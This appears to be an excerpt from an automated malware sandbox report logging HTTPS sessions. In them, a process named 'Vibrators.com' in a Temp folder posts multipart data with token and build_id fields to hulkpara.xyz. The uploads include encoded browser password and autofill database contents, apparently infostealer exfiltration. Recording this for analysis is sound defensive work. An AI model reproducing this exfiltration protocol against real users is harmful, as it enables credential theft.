2024-12-18 20:09:06 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:06 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:06 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:06 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49741	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:08 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----7G4EUSR9RI58QQIWT0ZC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:09:08 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 37 47 34 45 55 53 52 39 52 49 35 38 51 51 49 57 54 30 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 37 47 34 45 55 53 52 39 52 49 35 38 51 51 49 57 54 30 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 37 47 34 45 55 53 52 39 52 49 35 38 51 51 49 57 54 30 5a 43 0d 0a 43 6f 6e 74 Data Ascii: ------7G4EUSR9RI58QQIWT0ZCContent-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------7G4EUSR9RI58QQIWT0ZCContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------7G4EUSR9RI58QQIWT0ZCCont
2024-12-18 20:09:08 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:08 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:08 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:09:10 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49742	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:10 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----0R9H4EU37QIMYMGVKXT2 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:09:10 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 47 56 4b 58 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 47 56 4b 58 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 47 56 4b 58 54 32 0d 0a 43 6f 6e 74 Data Ascii: ------0R9H4EU37QIMYMGVKXT2Content-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------0R9H4EU37QIMYMGVKXT2Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------0R9H4EU37QIMYMGVKXT2Cont
2024-12-18 20:09:10 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:10 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:10 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:10 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2024-12-18 20:09:10 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:10 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:10 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:10 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:12 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:09:12 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49743	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
